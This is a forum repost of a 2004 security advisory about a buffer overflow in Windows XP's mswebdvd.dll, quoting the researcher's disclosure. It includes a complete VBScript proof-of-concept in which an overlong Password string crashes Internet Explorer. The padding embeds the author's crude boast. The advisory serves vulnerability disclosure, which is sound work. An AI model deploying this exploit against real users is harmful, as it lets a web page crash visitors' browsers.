=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets
Remote Users
Deny Service

DATE: Apr 6 2004

IMPACT: Denial of service via network

EXPLOIT INCLUDED: YES

VERSION(s): XP SP1, SP2

DESCRIPTION: Rafel Ivgi (The-Insider) reported a


vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user


can cause denial
of service conditions.

It is reported that a remote user can create HTML that


loads the
'MSWebDVD.MSWebDVD.1' active scripting object with


specially crafted
parameters for the AcceptParentalLevelChange() function


to cause the
target user's Internet Explorer browser to crash.


According to the
report, setting the 'Password' parameter to a value


longer than 255
characters trigger the flaw.

Some demonstration exploit HTML is provided in the


Source Message.
Impact: A remote user can create HTML that, when loaded


by the target
user, will cause the target user's Internet Explorer


browser to crash.
Solution: No solution was available at the time of this


entry.
Vendor URL: www.microsoft.com/technet/security/ (Links


to External
Site)

Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider



Message History: None.

Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer


Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail:
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
==>1) Introduction
==>
"mswebdvd.dll" is module that allows watching DVD films


from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object


can be created
and the user can watch online DVD films .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
==>2) Bug
==>
The "mswebdvd.dll" module was not correctly


designed/checked the
parametres that are being sent to


the "AcceptParentalLevelChange"
function. Therefore it is possible to D.O.S/CRASH


Internet Explorer
remotly.

The function :
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean


value),UserName as
string,Password as string

Setting the "Password" value with a string longer then


255 chars will
cause the overflow.

Unfortunatly this vulnerability effects all WindowsXP


versions after
all patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~
=>3) The Code
=>
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
a= a &
"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBB"
a= a &
"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC


CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC


CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCC"
a= a &
"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD


DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD


DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDD"
a= a &
"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE


EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE


EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEE"
a= a &
"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF


FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF


FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFF"
a= a &
"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG


GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG


GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGG"
a= a &
"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH


HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH


HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHH"
a= a &
"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIII"
a= a &
"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ


JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ


JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJ"
a= a &
"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKK"
a= a &
"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL


LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL


LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL"
a= a &
"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMM"
a= a &
"M1234567899876543211112222333344445555666677778888999998


761234rafiisthekingofthebufferoverflows
oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookfor


you03923610"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the


Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->Fuente:
http://www.securitytracker.com/aler...009673.htm
l



Windows equispe SP1 y SP2 tienen esta vulnerabilidad de


momento no hay
solucion disponible.



Ille Corvus. In Aeternum.
Meritorios de Filtrado (Kill-file):
tella llop, jm (N.B. 2003.10.25)
.

email Siga el debate Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaRespuesta Tengo una respuesta
Search Busqueda sugerida